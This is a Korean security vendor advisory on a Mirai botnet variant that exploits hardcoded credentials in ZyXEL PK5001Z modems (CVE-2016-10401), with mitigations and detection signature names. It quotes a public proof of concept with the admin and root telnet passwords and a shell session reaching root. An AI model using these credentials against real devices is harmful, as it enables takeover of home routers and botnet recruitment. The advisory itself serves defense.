Wins Security Information

보안 정보

앞 내용 보기 다음 내용 보기
취약점 정보ZYXEL PK5001Z 라우터취약점을 이용하는 새로운 Mirai봇넷
작성일 2017-11-29 조회 2752

 

 

♦ZYXEL PK5001Z 라우터취약점(CVE-2016-10401)을 이용하는 새로운 Mirai봇넷

 

 

 

 

ZyXEL PK5001Z Modem에 저장된 Default Password를 통해 관리자 권한을 탈취할 수 있다.
IoT Botnet은 ZyXEL PK5001Z Modem을 스캔해 Default Password를 입력하는 공격이 가능하다.

 

공격에 성공하면 ZyXEL PK5001Z 장치는 su 암호로 zyad5001을 사용하므로 루트 암호 없이 관리자 계정을 얻을 수 있다.


공격자는 백도어를 설치해, 기기의 제어권을 획득한다.

 

최초 발견한 360네트워크 시큐리티 팀에 의하면 두종류의 admin계정과 23,2323포트를 타겟으로 봇들의 공격이 집중적으로 발생했으며, 주요 대상은 아르헨티나로 알려졌다고 한다.

 

 

< 출처 : http://blog.netlab.360.com/early-warning-a-new-mirai-variant-is-spreading-quickly-on-port-23-and-2323-en/ >

 

< 출처 : http://blog.netlab.360.com/early-warning-a-new-mirai-variant-is-spreading-quickly-on-port-23-and-2323-en/ >

 

 

현재 이 새로운 Bot은 국내에도 다수 기기에 공격을 진행하고 있는것이 관찰되고 있어 주의가 요망된다.

 

 

 

공개된 POC 코드

 

Admin 계정으로 접속한 공격자는 공개된 SuperUser 계정 패스워드 (password: zyad5001)를 통해 관리자 권한을 탈취할 수 있다.

 

# Exploit Title: ZyXEL PK5001Z Modem - CenturyLink Hardcoded admin and root Telnet Password.
# Google Dork: n/a
# Date: 2017-10-31
# Exploit Author: Matthew Sheimo
# Vendor Homepage: https://www.zyxel.com/
# Software Link: n/a
# Version: PK5001Z 2.6.20.19
# Tested on: Linux
# About: ZyXEL PK5001Z Modem is used by Century Link a global communications and IT services company focused on connecting its customers to the power of the digital world.
# Linked CVE's: CVE-2016-10401
 
Hardcoded password for ZyXEL PK5001Z Modem, login with the following credentials via Telnet
 
username: admin
password: CenturyL1nk
 
Escalate to root with 'su' and this password.
 
password: zyad5001
 
 
[root:/]# telnet 192.168.0.1
Trying 192.168.0.1...
Connected to 192.168.0.1.
Escape character is '^]'.
 
PK5001Z login: admin
Password: CenturyL1nk
$ whoami
admin_404A03Tel
$ su
Password: zyad5001
# whoami
root
# uname -a
Linux PK5001Z 2.6.20.19 #54 Wed Oct 14 11:17:48 CST 2015 mips unknown
# cat /etc/zyfwinfo
Vendor Name:                      ZyXEL Communications Corp.

 

< 출처 : https://www.exploit-db.com/exploits/43105/ >

 

 

해결방안


1. Default 계정정보를 변경한다.
2. 주기적으로 계정정보를 변경한다.
3. 불필요한 사용자의 접근을 차단한다.
 

 

 

[Wins Sniper]

 - [3862] ZyXEL PK5001Z Modem Default Password

 - [3863] ZyXEL PK5001Z Modem Default Password.A

 - [3864] ZyXEL PK5001Z Modem Default Password(TCP-2323)

 - [3865] ZyXEL PK5001Z Modem Default Password.A(TCP-2323)

 

[Wins UTM]

 - [805374307] ZyXEL PK5001Z Modem Default Password

 - [805374308] ZyXEL PK5001Z Modem Default Password.A

 - [805374309] ZyXEL PK5001Z Modem Default Password(TCP-2323)

 - [805374310] ZyXEL PK5001Z Modem Default Password.A(TCP-2323)

 

[Wins APTX]

  - [3066]  ZyXEL PK5001Z Modem Default Password

  - [3067]  ZyXEL PK5001Z Modem Default Password.A

  - [3068]  ZyXEL PK5001Z Modem Default Password(TCP-2323)

  - [3069]  ZyXEL PK5001Z Modem Default Password.A(TCP-2323)

 

 

source

https://forum.openwrt.org/viewtopic.php?id=62266
https://www.exploit-db.com/exploits/43105/
http://blog.netlab.360.com/early-warning-a-new-mirai-variant-is-spreading-quickly-on-port-23-and-2323-en/

 

 

 

 

 

첨부파일 첨부파일이 없습니다.
태그 ZyXEL  PK5001Z  CVE-2016-10401  mirai  botnet